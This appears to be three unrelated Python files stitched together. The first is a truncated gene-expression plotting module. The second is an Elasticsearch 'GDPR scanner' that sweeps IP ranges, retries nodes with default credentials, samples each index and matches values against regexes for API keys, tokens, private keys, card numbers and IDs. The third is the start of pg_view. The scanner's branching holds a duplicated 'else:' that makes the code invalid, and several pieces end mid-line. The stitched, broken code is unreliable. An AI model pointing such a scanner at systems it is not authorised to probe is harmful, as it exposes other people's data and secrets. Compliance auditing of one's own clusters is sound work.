    _ = plt.legend(handles=[red_line, green_line], bbox_to_anchor=(1.21, 0.5), loc=10, fontsize=20, frameon=False)
def plot_genes(pseudotimes, geneProfiles, geneData, cpt, prediction):
    """ Plot GP posterior fits for six genes over pseudotime (McDavid
    cell-cycle data): one subplot per gene with the posterior mean,
    a +/- 2 sd band, the data points, and a dashed vertical line at
    the gene's published (cyclebase) peak time.

    Parameters:
        pseudotimes: inferred pseudotime per cell.
        geneProfiles: DataFrame of expression, one column per gene
            (assumes six genes for the 2x3 grid -- TODO confirm).
        geneData: per-gene records; .cbPeaktime is the published peak
            time as a percentage of the cell cycle.
        cpt: capture stage per cell, coded 1..3 (G0/G1, S, G2/M).
        prediction: tuple (Xnew, meanDf, varDf) with the posterior
            mean/variance evaluated on a grid of pseudotime values.
    """
    plt.rcParams['axes.facecolor'] = 'white'
    plt.rcParams['axes.edgecolor'] = 'Gray'
    plt.rc('xtick', labelsize=15)
    # Pseudotime axis range and capture offset fed to cbtime_to_tau
    startTime = 1.
    endTime = 3.55
    timeDiff = 0.85
    selectedGenes = geneProfiles.keys().values
    # Convert published peak times (percent of cycle) to pseudotime
    cbPeaktime = np.zeros(len(selectedGenes))
    for g in range(0, len(selectedGenes)):
        cbPeaktime[g] = cbtime_to_tau(geneData[selectedGenes[g]].cbPeaktime, startTime, endTime, timeDiff)
    Xnew = prediction[0]
    meanDf = prediction[1]
    varDf = prediction[2]
    # Create a Dataframe to contain predictive mean and variance
    predictDf = {}
    for i in range(len(selectedGenes)):
        predictDf[selectedGenes[i]] = pd.DataFrame({'mean': meanDf[selectedGenes[i]], 'var': varDf[selectedGenes[i]]})
    # Plot the result
    title = 'McDavid'
    xLabel = 'Pseudotime'
    yLabel = 'Expression'
    fig, ax = plt.subplots(nrows=2, ncols=3, sharex=True, sharey=True, figsize=(12, 8))
    fig.text(0.5, -0.04, xLabel, ha='center', va='center', fontsize=20)
    fig.text(0.04, 0.5, yLabel, ha='center', va='center', rotation='vertical', fontsize=20)
    # Label the x axis with cell-cycle phases instead of raw pseudotime
    xValues = np.array([1., 1.85, 2.7, 3.55])
    xString = np.array(['G2/M', 'G0/G1', 'S', 'G2/M'])
    plt.xticks(xValues, xString)
    plt.xlim(1., 3.55)
    # Following codes are used just to add legends
    cellCycleStages = {'g0/g1': u'red', 's': u'green', 'g2/m': u'blue'}
    stageColorCodes = ['red', 'green', 'blue']
    color_map = [stageColorCodes[cpt[i] - 1] for i in range(len(cpt))]
    markers = [plt.Line2D([0, 0], [0, 0], color=color, marker='o', markersize=9, linestyle='') for color in
               cellCycleStages.values()]
    l = plt.legend(markers, cellCycleStages.keys(), numpoints=1, title='Capture Stages', bbox_to_anchor=(1.6, 1.1),
                   loc=10, fontsize=20, frameon=False)
    plt.setp(l.get_title(), fontsize=20)
    # One subplot per gene, filled row by row
    n = 0
    for row in ax:
        for col in row:
            col.plot(Xnew[:, 0], predictDf[selectedGenes[n]]['mean'].values, 'black', lw=1)
            col.fill_between(Xnew[:, 0], predictDf[selectedGenes[n]]['mean'].values - \
                             2 * np.sqrt(predictDf[selectedGenes[n]]['var'].values),
                             predictDf[selectedGenes[n]]['mean'].values + \
                             2 * np.sqrt(predictDf[selectedGenes[n]]['var'].values), color='grey', alpha=0.5)
            col.scatter(pseudotimes, geneProfiles[selectedGenes[n]], 130, marker='.', c=color_map, alpha=0.6)
            col.set_title(selectedGenes[n], fontsize=16)
            col.axvline(cbPeaktime[n], linestyle='--', color='black')
            plt.setp(col.xaxis.get_majorticklabels(), rotation=90)
            col.yaxis.set_tick_params(labelsize=14)
            n = n + 1
def plotcorrelation(X, Y, title, data_labels):
    """ Scatter pseudotime (X) against capture time (Y), one color per
    capture stage.

    ``data_labels`` holds the stage label of each cell. Y values of
    the 32- and 64-cell stages are shifted down so the axis rows stay
    evenly spaced; the y ticks are relabeled to compensate (64 is
    drawn at 24, 32 at 24-8=24 -- presumably to keep the log-like
    spacing; TODO confirm intended offsets).
    """
    legend_order = ['1', '2', '4', '8', '16', '32 ICM', '32 TE', '64 PE', '64 TE', '64 EPI']
    # Tick positions vs displayed stage names
    yVals = np.array([1, 2, 4, 8, 16, 24, 32])
    yStrings = np.array(['1', '2', '4', '8', '16', '32', '64'])
    for l in legend_order:
        x = Y[data_labels == l]
        # Compress the capture-time axis; the '- 0.'/'+ 0.' branches
        # deliberately leave stages 1 and 4 unchanged
        if x[0] == 64.:
            x = [x[i] - 32 for i in range(0, len(x))]
        elif x[0] == 1.:
            x = [x[i] - 0. for i in range(0, len(x))]
        elif x[0] == 4.:
            x = [x[i] + 0. for i in range(0, len(x))]
        elif x[0] == 32.:
            x = [x[i] - 8. for i in range(0, len(x))]
        plt.scatter(X[data_labels == l], x, 100, label=l)
    plt.tick_params(labelsize=14)
    plt.yticks(yVals, yStrings)
    plt.xlabel('Pseudotime', fontsize=20)
    plt.ylabel('Capture time', fontsize=20)
    plt.title(title, fontsize=20)
    l = plt.legend(loc="lower right", fontsize=14, ncol=2, title="Capture stages", borderaxespad=0., columnspacing=0.2, handletextpad=0.1)
    plt.setp(l.get_title(), fontsize=16)
def plot_XY(X, Y, title, data_labels, label_order=None, **kwargs):
    """ Scatter two latent GPLVM dimensions, one color per capture
    stage, and print each stage's name at the group's median point.

    kwargs: 'ms' (marker size, default 100), 'fontsize' (stage-label
    size, default 16), 'xlabel', 'ylabel' override the defaults.
    """
    if label_order is None:
        label_order = ['1', '2', '4', '8', '16', '32 ICM', '32 TE', '64 PE', '64 TE', '64 EPI']
    mSize = 100
    if 'ms' in kwargs: mSize = kwargs.pop('ms')
    fsize = 16
    if 'fontsize' in kwargs: fsize = kwargs.pop('fontsize')
    for l in label_order:
        plt.scatter(X[data_labels == l], Y[data_labels == l], mSize, label=l)
        # Annotate the group at its median position
        xPos = np.median(X[data_labels == l])
        yPos = np.median(Y[data_labels == l])
        plt.text(xPos, yPos, l, fontsize=fsize, weight='bold')
    xlabel = 'GPLVM-1 (Pseudotime)'
    ylabel = 'GPLVM-2'
    if 'xlabel' in kwargs: xlabel = kwargs.pop('xlabel')
    if 'ylabel' in kwargs: ylabel = kwargs.pop('ylabel')
    plt.xlabel(xlabel, fontsize=20)
    plt.ylabel(ylabel, fontsize=20)
    plt.title(title, fontsize=20)
def correlation_dpt(xData, yData, cpt, ax, title, diagLine=False):
    """Scatter BGPLVM pseudotime against diffusion pseudotime, coloured by capture time.

    cpt values 1/2/3 map to red/green/blue; anything else is orange.
    When diagLine is True a reference diagonal is drawn.
    """
    capture_colors = OrderedDict((('0', 'red'), ('2', 'green'), ('4', 'blue'), ('7', 'orange')))
    stage_to_color = {1: 'red', 2: 'green', 3: 'blue'}
    color_map = [stage_to_color.get(stage, 'orange') for stage in cpt]
    # proxy artists for the legend, one per capture colour
    markers = [plt.Line2D([0, 0], [0, 0], color=c, marker='o', linestyle='')
               for c in capture_colors.values()]
    ax.scatter(xData, yData, 10, c=color_map)
    if diagLine:
        ax.plot([0, 0.7], [0, 0.7], linewidth=3)
    _ = plt.xticks(fontsize=14)
    _ = plt.yticks(fontsize=14)
    ax.set_xlabel('BGPLVM Pseudotime', fontsize=16)
    ax.set_ylabel('Diffusion Pseudotime', fontsize=16)
    ax.set_title(title, fontsize=18)
    ax.legend(markers, capture_colors.keys(), numpoints=1, title='Capture', fontsize=14, frameon=False)
def plot_robustness_across_prior_variance(array_of_values, single_value, title, xlabel, ylabel):
xVals = np.array([0.01, 5, 10, 15, 20, 25, 30, 35, 40, 45, | |
#!/usr/bin/env python
###########################################################
# GDPR scanner, by <NAME>
# see https://github.com/blookot/elastic-gdpr-scanner
###########################################################
# This script requires Python 3!
import sys
MIN_PYTHON = (3, 0)
if sys.version_info < MIN_PYTHON:
sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)
import socket
import subprocess
import sys
import threading
from queue import Queue
import signal
import time
from urllib.request import Request, urlopen, HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener, install_opener
from urllib.error import URLError, HTTPError
import json
import re
import argparse
import ipaddress
# variables and inputs
VERBOSE = False                 # print per-host/per-index debug output
API_OUTPUT = False              # pretty-print raw Elasticsearch JSON answers
SCAN_FIRST_INDEX_ONLY = False   # stop after the first non-internal index of each node (faster)
SCAN_FIRST_PORT_ONLY = False    # stop after the first open port of each host
GDPR_SCAN = False  # by default, don't scan (inventory only)
THREAD_TIMEOUT = 240  # timeout per host, in seconds
DEFAULT_TCP_SOCKET_TIMEOUT = 2  # timeout for port scan, in seconds
DEFAULT_NB_THREADS = 10  # nb of targets to scan in parallel
DEFAULT_TARGET = '127.0.0.1'
DEFAULT_PORT = '9200'
DEFAULT_USER = 'elastic'
DEFAULT_PASSWORD = '<PASSWORD>'
DEFAULT_LOG_FILE = 'es-gdpr-report.csv'
# status codes used by runRequest() to classify a probe's outcome
HTTP_OK = 0
HTTP_ERROR = -1
HTTP_UNAUTHORIZED = -2
# PII can include driver's licenses, license plate numbers, VAT codes, healthcare identification numbers, and various other national ID numbers.
# main source: https://ipsec.pl/data-protection/2012/european-personal-data-regexp-patterns.html
# https://github.com/tvfischer/gdpr-data-patterns-detection which is empty...
# Patterns that indicate PII / secrets when matched against document values.
REGEXES = [
    'AIza[0-9A-Za-z-_]{35}',  # google_api
    '6L[0-9A-Za-z-_]{38}|^6[0-9a-zA-Z_-]{39}$',  # google_captcha
    'ya29\.[0-9A-Za-z\-_]+',  # google_oauth
    'AKIA[0-9A-Z]{16}',  # amazon_aws_access_key_id
    'amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',  # amazon_mws_auth_token
    's3\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\.s3\.amazonaws.com',  # amazon_aws_url
    'EAACEdEose0cBA[0-9A-Za-z]+',  # facebook_access_token
    'basic\s*[a-zA-Z0-9=:_\+\/-]+',  # authorization_basic
    'bearer\s*[a-zA-Z0-9_\-\.=:_\+\/]+',  # authorization_bearer
    'api[key|\s*]+[a-zA-Z0-9_\-]+',  # authorization_api
    'key-[0-9a-zA-Z]{32}',  # mailgun_api_key
    'SK[0-9a-fA-F]{32}',  # twilio_api_key
    'AC[a-zA-Z0-9_\-]{32}',  # twilio_account_sid
    'AP[a-zA-Z0-9_\-]{32}',  # twilio_app_sid
    'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}',  # paypal_braintree_access_token
    'sq0csp-[ 0-9A-Za-z\-_]{43}|sq0[a-z]{3}-[0-9A-Za-z\-_]{22,43}',  # square_oauth_secret
    'sqOatp-[0-9A-Za-z\-_]{22}|EAAA[a-zA-Z0-9]{60}',  # square_access_token
    'sk_live_[0-9a-zA-Z]{24}',  # stripe_standard_api
    'rk_live_[0-9a-zA-Z]{24}',  # stripe_restricted_api
    '[a-zA-Z0-9_-]*:[a-zA-Z0-9_\-]+@github\.com*',  # github_access_token
    '-----BEGIN RSA PRIVATE KEY-----',  # rsa_private_key
    '-----BEGIN DSA PRIVATE KEY-----',  # ssh_dsa_private_key
    '-----BEGIN EC PRIVATE KEY-----',  # ssh_dc_private_key
    '-----BEGIN PGP PRIVATE KEY BLOCK-----',  # pgp_private_block
    'ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*$',  # json_web_token
    '^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$',  # email addresses
    '\b(?!000|666|9\d{2})([0-8]\d{2}|7([0-6]\d))([-]?|\s{1})(?!00)\d\d\2(?!0000)\d{4}\b',  # U.S. Social Security numbers, e.g. 513-84-7329
    '^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',  # MasterCard numbers
    # BUG FIX: the next three entries were missing trailing commas, so Python's
    # implicit string concatenation silently merged them into one broken pattern.
    '\b([4]\d{3}[\s]\d{4}[\s]\d{4}[\s]\d{4}|[4]\d{3}[-]\d{4}[-]\d{4}[-]\d{4}|[4]\d{3}[.]\d{4}[.]\d{4}[.]\d{4}|[4]\d{3}\d{4}\d{4}\d{4})\b',  # Visa card numbers, e.g. 4563-7568-5698-4587
    '^3[47][0-9]{13}$',  # American Express card numbers
    '^((\d{5}-\d{4})|(\d{5})|([A-Z]\d[A-Z]\s\d[A-Z]\d))$',  # U.S. ZIP codes
    '[1,2][ ]?[0-9]{2}[ ]?[0,1,2,3,5][0-9][ ]?[0-9]{2}[ ]?[0-9]{3}[ ]?[0-9]{3}[ ]?[0-9]{2}',  # French social security number
    '[0-9]{2}[A-Z]{2}[0-9]{5}',  # French passport number
    '[0-9]{2}[0,1][0-9][0-9]{2}-[A-Z]-[0-9]{5}',  # German Personenkennziffer
    # '[0-9]{3}/?[0-9]{4}/?[0-9]{4}',  # German Steuer-Identifikationsnummer
    '[0-9]{2}[0-9]{2}[0,1][0-9][0-9]{2}[A-Z][0-9]{2}[0-9]',  # German Versicherungsnummer, Rentenversicherungsnummer
    '[0-9,X,M,L,K,Y][0-9]{7}[A-Z]',  # Spanish Documento Nacional de Identidad
    '[A-CEGHJ-PR-TW-Z][A-CEGHJ-NPR-TW-Z]{1}[0-9]{6}[A-DFM]?',  # UK National Identity Number
    # '[0-9]{3}[ -]?[0-9]{3}[ -]?[0-9]{4}',  # UK national health security number, but matches certain beats!
    '[0-9]{2}\.?[0-9]{2}\.?[0-9]{2}-[0-9]{3}\.?[0-9]{2}',  # Belgium ID
    '[A-Z]{2}?[ ]?[0-9]{2}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}',  # EU IBAN
    # social / web profile URLs and contact schemes
    '(?:https?:)?\\/\\/angel\\.co\\/company\\/(?P<company>[A-z0-9_-]+)(?:\\/(?P<company_subpage>[A-z0-9-]+))?',
    '(?:https?:)?\\/\\/angel\\.co\\/company\\/(?P<company>[A-z0-9_-]+)\\/jobs\\/(?P<job_permalink>(?P<job_id>[0-9]+)-(?P<job_slug>[A-z0-9-]+))',
    '(?:https?:)?\\/\\/angel\\.co\\/(?P<type>u|p)\\/(?P<user>[A-z0-9_-]+)',
    'mailto:(?P<email>[A-z0-9_.+-]+@[A-z0-9_.-]+\\.[A-z]+)',
    '(?:https?:)?\\/\\/(?:www\\.)?(?:facebook|fb)\\.com\\/(?P<profile>(?![A-z]+\\.php)(?!marketplace|gaming|watch|me|messages|help|search|groups)[A-z0-9_\\-\\.]+)\\/?',
    '(?:https?:)?\\/\\/(?:www\\.)facebook.com/(?:profile.php\\?id=)?(?P<id>[0-9]+)',
    '(?:https?:)?\\/\\/(?:www\\.)?github\\.com\\/(?P<login>[A-z0-9_-]+)\\/(?P<repo>[A-z0-9_-]+)\\/?',
    '(?:https?:)?\\/\\/(?:www\\.)?github\\.com\\/(?P<login>[A-z0-9_-]+)\\/?',
    '(?:https?:)?\\/\\/plus\\.google\\.com\\/(?P<id>[0-9]{21})',
    '(?:https?:)?\\/\\/plus\\.google\\.com\\/\\+(?P<username>[A-z0-9+]+)',
    '(?:https?:)?\\/\\/news\\.ycombinator\\.com\\/item\\?id=(?P<item>[0-9]+)',
    '(?:https?:)?\\/\\/news\\.ycombinator\\.com\\/user\\?id=(?P<user>[A-z0-9_-]+)',
    '(?:https?:)?\\/\\/(?:www\\.)?(?:instagram\\.com|instagr\\.am)\\/(?P<username>[A-Za-z0-9_](?:(?:[A-Za-z0-9_]|(?:\\.(?!\\.))){0,28}(?:[A-Za-z0-9_]))?)',
    '(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/company\\/(?P<company_permalink>[A-z0-9-\\.]+)\\/?',
    '(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/feed\\/update\\/urn:li:activity:(?P<activity_id>[0-9]+)\\/?',
    '(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/in\\/(?P<permalink>[\\w\\-\\_\u00c0-\u00ff%]+)\\/?',
    '(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/pub\\/(?P<permalink_pub>[A-z0-9_-]+)(?:\\/[A-z0-9]+){3}\\/?',
    '(?:https?:)?\\/\\/medium\\.com\\/(?:(?:@(?P<username>[A-z0-9]+))|(?P<publication>[a-z-]+))\\/(?P<slug>[a-z0-9\\-]+)-(?P<post_id>[A-z0-9]+)(?:\\?.*)?',
    '(?:https?:)?\\/\\/(?P<publication>(?!www)[a-z-]+)\\.medium\\.com\\/(?P<slug>[a-z0-9\\-]+)-(?P<post_id>[A-z0-9]+)(?:\\?.*)?',
    '(?:https?:)?\\/\\/medium\\.com\\/@(?P<username>[A-z0-9]+)(?:\\?.*)?',
    '(?:https?:)?\\/\\/medium\\.com\\/u\\/(?P<user_id>[A-z0-9]+)(?:\\?.*)',
    '(?:tel|phone|mobile):(?P<number>\\+?[0-9. -]+)',
    '(?:https?:)?\\/\\/(?:[a-z]+\\.)?reddit\\.com\\/(?:u(?:ser)?)\\/(?P<username>[A-z0-9\\-\\_]*)\\/?',
    '(?:(?:callto|skype):)(?P<username>[a-z][a-z0-9\\.,\\-_]{5,31})(?:\\?(?:add|call|chat|sendfile|userinfo))?',
    '(?:https?:)?\\/\\/(?:www\\.)?snapchat\\.com\\/add\\/(?P<username>[A-z0-9\\.\\_\\-]+)\\/?',
    '(?:https?:)?\\/\\/(?:www\\.)?stackexchange\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
    '(?:https?:)?\\/\\/(?:(?P<community>[a-z]+(?!www))\\.)?stackexchange\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
    '(?:https?:)?\\/\\/(?:www\\.)?stackoverflow\\.com\\/questions\\/(?P<id>[0-9]+)\\/(?P<title>[A-z0-9-_.]+)\\/?',
    '(?:https?:)?\\/\\/(?:www\\.)?stackoverflow\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
    '(?:https?:)?\\/\\/(?:t(?:elegram)?\\.me|telegram\\.org)\\/(?P<username>[a-z0-9\\_]{5,32})\\/?',
    '(?:https?:)?\\/\\/(?:[A-z]+\\.)?twitter\\.com\\/@?(?P<username>[A-z0-9_]+)\\/status\\/(?P<tweet_id>[0-9]+)\\/?',
    '(?:https?:)?\\/\\/(?:[A-z]+\\.)?twitter\\.com\\/@?(?P<username>[A-z0-9_]+)\\/?',
    '(?:https?:)?\\/\\/vimeo\\.com\\/user(?P<id>[0-9]+)',
    '(?:https?:)?\\/\\/(?:(?:www)?vimeo\\.com|player.vimeo.com\\/video)\\/(?P<id>[0-9]+)',
    '(?:https?:)?\\/\\/(?:[A-z]+\\.)?youtube.com\\/channel\\/(?P<id>[A-z0-9-\\_]+)\\/?',
    '(?:https?:)?\\/\\/(?:[A-z]+\\.)?youtube.com\\/user\\/(?P<username>[A-z0-9]+)\\/?',
    '(?:https?:)?\\/\\/(?:(?:www\\.)?youtube\\.com\\/(?:watch\\?v=|embed\\/)|youtu\\.be\\/)(?P<id>[A-z0-9\\-\\_]+)',
]
# a print_lock is what is used to prevent "double" modification of shared variables.
# this is used so while one thread is using a variable, others cannot access
# it. Once done, the thread releases the print_lock.
# to use it, you want to specify a print_lock per thing you wish to print_lock.
print_lock = threading.Lock()  # shared by all scanner threads
start_time = time.time()  # scan start; presumably used later to report elapsed time (end of script not visible here)
# handle Ctrl-C to stop
def signal_handler(sig, frame):
    """SIGINT handler: announce the interrupt and terminate the process.

    Parameters follow the signal-handler protocol: ``sig`` is the signal number,
    ``frame`` the interrupted stack frame (unused). The first parameter was
    renamed from ``signal`` so it no longer shadows the signal module.
    """
    print('You pressed Ctrl+C!')
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# main scanning function
def portscan(hostname):
    """Scan one host: probe each port in PORTS, fingerprint Elasticsearch nodes,
    and (when GDPR_SCAN is set) sample one document per index for PII matches.

    Relies on module globals: PORTS, VERBOSE, TCP_SOCKET_TIMEOUT, GDPR_SCAN,
    SCAN_FIRST_INDEX_ONLY, SCAN_FIRST_PORT_ONLY, logFile and the HTTP_* codes.
    Results are printed and appended to the CSV logFile.
    """
    ip = socket.gethostbyname(hostname)
    for port in PORTS:
        if VERBOSE:
            print ("** DEBUG ** Scanning Host: {}, Port {}".format(ip,port))
        try:
            # plain TCP connect to check whether the port is open at all
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.settimeout(float(TCP_SOCKET_TIMEOUT))
            s.connect((ip,int(port)))
            s.close()
        except socket.gaierror:
            print ('Hostname could not be resolved. Exiting')
            # pass
        except socket.error:
            print ("Host: {}, Port {}: Closed".format(ip,port))
            # pass
        else:
            if VERBOSE:
                print ("Host: {}, Port {}: Open".format(ip,port))
            # Try getting ES answer
            # first try http with no authentication
            auth = False
            proto = 'http'
            encr = False
            res = runRequest(proto,hostname,port,'',auth)
            if res['code'] == HTTP_ERROR:
                # now try with https
                proto = 'https'
                encr = True
                res = runRequest(proto,hostname,port,'',auth)
            # if we need auth, try again with auth
            if res['code'] == HTTP_UNAUTHORIZED:
                # auth in place, retry with auth
                auth = True
                res = runRequest(proto,hostname,port,'',auth)
            if res['code'] == HTTP_OK:
                # root endpoint answered: extract cluster identity fields
                esAnswer = res['content']
                if 'cluster_name' in esAnswer:
                    clusterName = esAnswer['cluster_name']
                else:
                    clusterName = "null"
                if 'name' in esAnswer:
                    name = esAnswer['name']
                else:
                    name = "null"
                if 'version' in esAnswer:
                    if 'number' in esAnswer['version']:
                        versionNumber = esAnswer['version']['number']
                    else:
                        versionNumber = 'null'
                    else:
                        versionNumber = 'null'
                # then grab stats on node from /_stats/docs,store
                res = runRequest(proto,hostname,port,'/_stats/docs,store',auth)
                if res['code'] == HTTP_OK:
                    esAnswer = res['content']
                    if '_all' in esAnswer:
                        if 'total' in esAnswer['_all']:
                            totalDocs = esAnswer['_all']['total']['docs']['count']
                            # size reported in MB
                            totalSize = int(int(esAnswer['_all']['total']['store']['size_in_bytes'])/(1024*1024))
                        else:
                            totalDocs = 'null'
                            totalSize = 'null'
                    else:
                        totalDocs = 'null'
                        totalSize = 'null'
                    print ("Found Host: {}, Port: {}, Encrypted: {}, Authenticated: {}, Cluster name: {}, Name: {}, Version: {}, Total number of docs: {}, Total size (MB): {}".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize))
                    logFile.write("{},{},{},{},{},{},{},{},{}\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize))
                    if GDPR_SCAN:
                        # then explore indices
                        # /_cat/indices introduced in 1.3, not working on v0.90 (thus relying on node stats...)
                        if 'indices' in esAnswer:
                            for index, indexDetails in iter(esAnswer['indices'].items()):
                                if VERBOSE:
                                    print ("** Testing index {}".format(index))
                                # consider non-internal indices
                                if index[:1] != '.':
                                    # grab index stats
                                    # print (json.dumps(data, sort_keys=True, indent=4, separators=(',', ': ')))
                                    indexNbDocs = indexDetails['total']['docs']['count']
                                    indexSize = int(int(indexDetails['total']['store']['size_in_bytes'])/(1024*1024))
                                    # then get first doc : /[index]/_search?size=1
                                    res = runRequest(proto,hostname,port,index+"/_search?size=1",auth)
                                    if res['code'] == HTTP_OK:
                                        esDocs = res['content']
                                        # check if at least 1 document
                                        if esDocs['hits']['total'] == 0:
                                            if VERBOSE:
                                                print ("No document found in index "+index)
                                            logFile.write("{},{},{},{},{},{},{},{},{},{},{},{},N/A (no doc)\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize, index, indexNbDocs, indexSize))
                                        else:
                                            # get source doc
                                            try:
                                                source = esDocs['hits']['hits'][0]['_source']
                                            except:
                                                print ('Couldn\'t get document from index '+index)
                                            else:
                                                # check for compliance calling regex checker func (outputs true when regex match, ie *not* compliant)
                                                rgpdCheck = regex_checker(source)
                                                if VERBOSE:
                                                    print ('** Testing index {}, result: {}'.format(index, rgpdCheck['result']))
                                                else:
                                                    if rgpdCheck['result']:
                                                        # display uncompliant indices even if not verbose
                                                        print ("** Host: {}, Port: {}, Encrypted: {}, Authenticated: {}, Cluster name: {}, Name: {}, Version: {} - Index {} not compliant! (value '{}' matched regex '{}')".format(ip, port, encr, auth, clusterName, name, versionNumber, index, rgpdCheck['value'], rgpdCheck['regex']))
                                                # log in file anyway
                                                logFile.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize, index, indexNbDocs, indexSize, not(rgpdCheck['result']), rgpdCheck['value'], rgpdCheck['regex']))
                                    # scan only first index to go faster
                                    if SCAN_FIRST_INDEX_ONLY:
                                        break
                        # indices listing didn't work
                        else:
                            print ('Couldn\'t list indices')
            else:
                # open port that doesn't answer like Elasticsearch on the root endpoint
                print ("Found Host: {}, Port {}, Encrypted: {}, Authenticated: {}".format(ip, port, encr, auth))
                logFile.write("{},{},{},{}\r\n".format(ip, port, encr, auth))
            # scan first port only
            if SCAN_FIRST_PORT_ONLY:
                break
# regex checker func (outputs true when regex match, ie outputs true when *not* compliant)
def regex_checker(jsonDoc):
    """Recursively scan a JSON document's string values against REGEXES.

    Returns {'result': True, 'value': ..., 'regex': ...} for the first match
    found (document is *not* compliant), or {'result': False, 'value': '',
    'regex': ''} when no value matches any pattern.
    """
    if VERBOSE:
        # debug dump of the document under test (was unconditional debug leftover)
        print ('Testing: '+json.dumps(jsonDoc))
    for key, value in iter(jsonDoc.items()):
        if isinstance(value, str):
            for r in REGEXES:
                check = bool(re.search(r, value))
                if VERBOSE:
                    print ('\tCheck '+value+' against regex \''+r+'\': '+str(check))
                if check:
                    return {"result":True, "value":value, "regex":r}
        elif isinstance(value,dict):
            # bug fix: the nested result used to be returned unconditionally,
            # which aborted the scan of the remaining keys even when the
            # nested dict was compliant
            nested = regex_checker(value)
            if nested['result']:
                return nested
    return {"result":False, "value":"", "regex":""}
# sub function just running the GET
def runRequest(proto,host,port,query,auth):
    """Perform a single HTTP(S) GET against an Elasticsearch endpoint.

    Returns a dict:
      'code'          HTTP_OK / HTTP_ERROR / HTTP_UNAUTHORIZED (module-level codes)
      'encrypted'     True when proto is 'https'
      'authenticated' echo of the auth flag
      'content'       decoded JSON body on success, '' otherwise
    Uses module globals USER, PASSWORD, VERBOSE and API_OUTPUT.
    """
    res = { 'code': HTTP_ERROR, 'encrypted': True, 'authenticated': True, 'content': ''}
    res['encrypted'] = (proto == 'https')
    res['authenticated'] = auth
    url = proto + '://' + host + ':' + port + '/' + query
    if VERBOSE:
        print ("Calling query {}".format(url))
    if auth:
        # create an authorization handler for basic auth on Elasticsearch
        p = HTTPPasswordMgrWithDefaultRealm()
        p.add_password(None, url, USER, PASSWORD)
        auth_handler = HTTPBasicAuthHandler(p)
        opener = build_opener(auth_handler)
        install_opener(opener)
    # add headers
    headers = {}
    headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
    try:
        # run request
        req = Request(url,headers=headers)
        r = urlopen(req)
    except HTTPError as e:
        if VERBOSE:
            print('Error HTTPError: '+str(e))
        # 401 means the node is alive but requires credentials; checking the
        # status code is more robust than matching 'Unauthorized' in str(e)
        if e.code == 401:
            res['code'] = HTTP_UNAUTHORIZED
        return res
    except URLError as e:
        if VERBOSE:
            print('Error URLError: '+str(e))
        return res
    except Exception as e:
        # note: a bare 'except:' that followed here was unreachable and was removed
        if VERBOSE:
            print('Error: '+str(e))
        return res
    else:
        try:
            if r.code == 200:
                content = json.loads(r.read().decode('utf-8'))
                if API_OUTPUT:
                    print (json.dumps(content, sort_keys=True, indent=4, separators=(',', ': ')))
                res['code'] = HTTP_OK
                res['content'] = content
                return res
            else:
                return res
        except Exception as e:
            if VERBOSE:
                print('Error: '+str(e))
            return res
# Getting arguments
parser = argparse.ArgumentParser(description='Scan Elasticsearch clusters to check for GDPR compliance.')
parser.add_argument('--target', action='store', default='', help='Hostname or IP range (CIDR format, eg 10.50.3.0/24) to scan (default: localhost)')
parser.add_argument('--port', action='store', default='', help='Port where Elasticsearch is running (default: 9200)')
parser.add_argument('--user', action='store', default='', help='Username to use to authenticate to Elasticsearch (default: elastic)')
parser.add_argument('--password', action='store', default='', help='Username to use to authenticate to Elasticsearch (default: changeme)')
parser.add_argument('--regex', action='store', default='', help='Specific regex to look for')
parser.add_argument('--nb-threads', action='store', default='', dest='nbthreads', help='Number of hosts to scan in parallel (default: 10)')
parser.add_argument('--socket-timeout', action='store', default='', dest='stimeout', help='Seconds to wait for each host/port scanned. Set it to 2 on the Internet, 0.5 in local networks (default: 2)')
parser.add_argument('--run-scan', action='store_true', default=False, dest='scan', help='Run scan for GDPR data (based on regex matching)')
parser.add_argument('--out', action='store', default='', help='Log file with verbose output (default: es-gdpr-report.csv)')
parser.add_argument('--verbose', action='store_true', | |
<reponame>pshen/pg_view<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import glob
import logging
from optparse import OptionParser
from operator import itemgetter
from datetime import datetime, timedelta
from numbers import Number
from multiprocessing import Process, JoinableQueue, cpu_count # for then number of cpus
import platform
import resource
import socket
import subprocess
import time
import traceback
import json
from collections import namedtuple
__appname__ = 'pg_view'
__version__ = '1.3.0'
__author__ = '<NAME> <<EMAIL>>'
__license__ = 'Apache 2.0'
if sys.hexversion >= 0x03000000:
import configparser as ConfigParser
from queue import Empty
long = int
maxsize = sys.maxsize
else:
import ConfigParser
from Queue import Empty
maxsize = sys.maxint
try:
